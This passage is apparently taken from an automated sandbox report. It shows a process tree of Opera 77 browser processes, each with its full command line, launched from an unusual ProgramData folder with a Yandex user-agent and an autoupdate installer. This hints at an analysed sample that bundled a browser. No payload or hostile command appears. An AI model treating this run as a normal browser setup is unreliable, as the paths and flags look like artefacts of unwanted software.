                                                                                                                                                                                                                                                                                      "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --service-sandbox-type=none --enable-quic --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --start-stack-profiler --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --mojo-platform-channel-handle=1812 /prefetch:8
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:5600
                                                                                                                                                                                                                                                                                      • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                        "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --service-sandbox-type=utility --enable-quic --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --mojo-platform-channel-handle=2284 /prefetch:8
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:5032
                                                                                                                                                                                                                                                                                        • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                          "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --service-sandbox-type=utility --enable-quic --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --mojo-platform-channel-handle=2640 /prefetch:8
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:1540
                                                                                                                                                                                                                                                                                          • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                            "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --service-sandbox-type=utility --enable-quic --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --mojo-platform-channel-handle=2680 /prefetch:8
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:3092
                                                                                                                                                                                                                                                                                            • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                              "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --service-sandbox-type=utility --enable-quic --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --mojo-platform-channel-handle=2692 /prefetch:8
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:4500
                                                                                                                                                                                                                                                                                              • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --service-sandbox-type=utility --enable-quic --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --mojo-platform-channel-handle=2704 /prefetch:8
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:4948
                                                                                                                                                                                                                                                                                                • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                  "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --service-sandbox-type=utility --enable-quic --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --mojo-platform-channel-handle=2716 /prefetch:8
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:1208
                                                                                                                                                                                                                                                                                                  • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                    "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --service-sandbox-type=utility --enable-quic --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --mojo-platform-channel-handle=2728 /prefetch:8
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:5204
                                                                                                                                                                                                                                                                                                    • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                      "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=renderer --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2252 /prefetch:1
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:372
                                                                                                                                                                                                                                                                                                      • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                        "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=renderer --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --extension-process --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:1512
                                                                                                                                                                                                                                                                                                        • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                          "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=renderer --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:1
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:4524
                                                                                                                                                                                                                                                                                                          • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                            "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=renderer --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:932
                                                                                                                                                                                                                                                                                                            • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                              "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=renderer --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --extension-process --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:3336
                                                                                                                                                                                                                                                                                                              • C:\ProgramData\ApplicationO\77.0.4054.277\opera_autoupdate.exe
                                                                                                                                                                                                                                                                                                                "C:\ProgramData\ApplicationO\77.0.4054.277\opera_autoupdate.exe" --newlogic --user-data-dir="C:\ProgramData\ApplicationO\profile\data" --pipeid=oauc_pipe80ace3fba62af4a20793fabf65829004
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:4840
                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\ApplicationO\77.0.4054.277\opera_autoupdate.exe
                                                                                                                                                                                                                                                                                                                    C:\ProgramData\ApplicationO\77.0.4054.277\opera_autoupdate.exe --type=crashpad-handler --user-data-dir=C:\ProgramData\ApplicationO\profile\data /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\ProgramData\ApplicationO\profile\data\Crash Reports" --crash-count-file=C:\ProgramData\ApplicationO\profile\data\crash_count.txt --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=77.0.4054.277 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ff76bd3b0d0,0x7ff76bd3b0e0,0x7ff76bd3b0f0
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                      PID:4696
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\installer.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\.opera\installer.exe" --version
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                        PID:3896
                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                                      "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --service-sandbox-type=audio --enable-quic --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --mojo-platform-channel-handle=3268 /prefetch:8
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:5384
                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                                        "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=renderer --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:1
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                          PID:3712
                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                                          "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=renderer --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --disable-gpu-compositing --lang=ru --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --extension-process --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:392
                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                                            "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --service-sandbox-type=video_capture --enable-quic --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --mojo-platform-channel-handle=5172 /prefetch:8
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:4316
                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
